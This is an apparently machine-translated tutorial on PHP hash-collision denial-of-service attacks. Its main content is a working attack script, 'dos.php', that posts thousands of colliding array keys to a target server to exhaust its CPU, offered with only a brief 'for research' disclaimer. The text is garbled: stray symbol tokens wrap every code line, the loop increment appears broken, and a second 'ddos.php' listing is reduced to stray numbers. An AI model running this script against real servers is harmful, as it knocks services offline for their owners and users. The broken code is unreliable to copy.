This article mainly introduces how PHP uses hash conflict vulnerabilities to carry out DDoS attacks. An example analysis of how PHP uses hash to carry out DDoS attacks. For the principles and implementation techniques of DDoS attacks, friends in need can refer to it
This article provides an example analysis of how PHP uses hash conflict vulnerabilities to carry out DDoS attacks. Share it with everyone for your reference. The specific analysis is as follows:
First of all, a statement: The content of this article is only for research and study use, please do not use it for illegal activities!
As mentioned earlier, the hash table collision vulnerability has recently been exposed. Many common languages including java, python, php, etc. have not been spared. Let’s take a look at its power tonight.
Attack principle:
By posting a set of carefully assembled array parameters to the target server, when the bottom layer of the language processes the received array parameters after reaching the server, the existence of this vulnerability causes a large amount of CPU consumption, eventually leading to the exhaustion of server resources.
No fancy tricks are needed, just use PHP to simply implement it and see the effect, just click on it.
File: dos.php
?
|
<🎜> <🎜>// Target address<🎜> <🎜>// As long as the target address exists, it doesn’t matter what it is for <🎜> <🎜>$host = 'http://127.0.0.1/test.php';<🎜> <🎜>$data = '';<🎜> <🎜>$size = pow(2, 15);<🎜> <🎜>for ($key=0, $max=($size-1)*$size; $key<=$max; $key =$size)<🎜> <🎜>{<🎜> <🎜>$data .= '&array[' . $key . ']=0';<🎜> <🎜>}<🎜> <🎜>$ret = curl($host, ltrim($data,'&'));<🎜> <🎜>var_dump($ret);<🎜> <🎜>function curl($url, $post, $timeout = 30){<🎜> <🎜>$ch = curl_init();<🎜> <🎜>curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);<🎜> <🎜>curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);<🎜> <🎜>curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);<🎜> <🎜>curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));<🎜> <🎜>curl_setopt($ch, CURLOPT_URL, $url);<🎜> <🎜>curl_setopt($ch, CURLOPT_POST, true);<🎜> <🎜>curl_setopt($ch, CURLOPT_POSTFIELDS, $post);<🎜> <🎜>$output = curl_exec($ch);<🎜> <🎜>if ($output === false) return false;<🎜> <🎜>$info = curl_getinfo($ch);<🎜> <🎜>$http_code = $info['http_code'];<🎜> <🎜>if ($http_code == 404) return false;<🎜> <🎜>curl_close($ch);<🎜> <🎜>return $output;<🎜> <🎜>}<🎜> <🎜> |
文件:ddos.php
?
3 4 513 14
|
|